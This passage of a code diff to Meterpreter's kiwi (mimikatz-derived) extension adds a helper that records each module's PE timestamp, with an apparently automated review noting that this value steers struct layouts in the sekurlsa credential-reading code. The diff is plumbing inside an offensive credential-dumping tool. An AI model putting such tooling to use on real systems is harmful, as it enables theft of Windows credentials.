 if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength)) {
 aBuffer.address = moduleName.Buffer;
 aProcess.address = LdrEntry.BaseDllName.Buffer;
- if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+ if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+ {
+ kull_m_process_adjustTimeDateStamp(&moduleInformation);
 continueCallback = callBack(&moduleInformation, pvArg);
+ }
 LocalFree(moduleName.Buffer);
 }
 }
@@ -185,8 +190,11 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 if(moduleName.Buffer = (PWSTR) LocalAlloc(LPTR, moduleName.MaximumLength)) {
 aBuffer.address = moduleName.Buffer;
 aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
- if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+ if (kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
+ {
+ kull_m_process_adjustTimeDateStamp(&moduleInformation);
 continueCallback = callBack(&moduleInformation, pvArg);
+ }
 LocalFree(moduleName.Buffer);
 }
 }
@@ -208,6 +216,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
 {
 RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
+ kull_m_process_adjustTimeDateStamp(&moduleInformation);
 continueCallback = callBack(&moduleInformation, pvArg);
 }
 }
@@ -223,6 +232,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
 return status;
 }
+void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
+{
+ PIMAGE_NT_HEADERS ntHeaders;
+ if (kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
+ {
+ information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
+ LocalFree(ntHeaders);
+ }
+ else information->TimeDateStamp = 0;
+}
+
 BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
 {
 if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
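Review bot: kull_m_process_adjustTimeDateStamp writes `TimeDateStamp = 0` when `kull_m_process_ntheaders` fails, and its only visible consumer (`kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000` in kuhl_m_sekurlsa.c) cannot tell "headers unreadable" from "old module", so a transient read failure silently flips the struct layout chosen for that process; that failure mode deserves at least a comment and ideally a `BOOL` return so callers can log it. The function has no documentation and uses `void` where the rest of the file writes `VOID`/`NTSTATUS`; I would put `/* Fills information->TimeDateStamp from the module's IMAGE_FILE_HEADER read via information->DllBase (hMemory must already be set). Sets 0 when the NT headers cannot be read, which callers cannot distinguish from a genuine zero stamp. */` above it. The same helper is now invoked on every module in all five enumeration paths of kull_m_process_getVeryBasicModuleInformations (hunks at -101, -121, -151, -185 and -208), i.e. one extra header read per module even for callers that never look at the stamp; presumably acceptable, but worth a note on the callback struct in kull_m_process.h. kull_m_process_getVeryBasicModuleInformations itself begins before the first of these hunks.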
diff --git a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
index 1ee0ce37..3397cff1 100644
--- a/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
+++ b/c/meterpreter/source/extensions/kiwi/modules/kull_m_process.h
@@ -324,6 +324,7 @@ VOID kull_m_process_initialise();
 typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
 KULL_M_MEMORY_ADDRESS DllBase;
 ULONG SizeOfImage;
+ ULONG TimeDateStamp;
 PCUNICODE_STRING NameDontUseOutsideCallback;
 } KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
@@ -346,6 +347,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
 typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
+void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
 BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
 BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);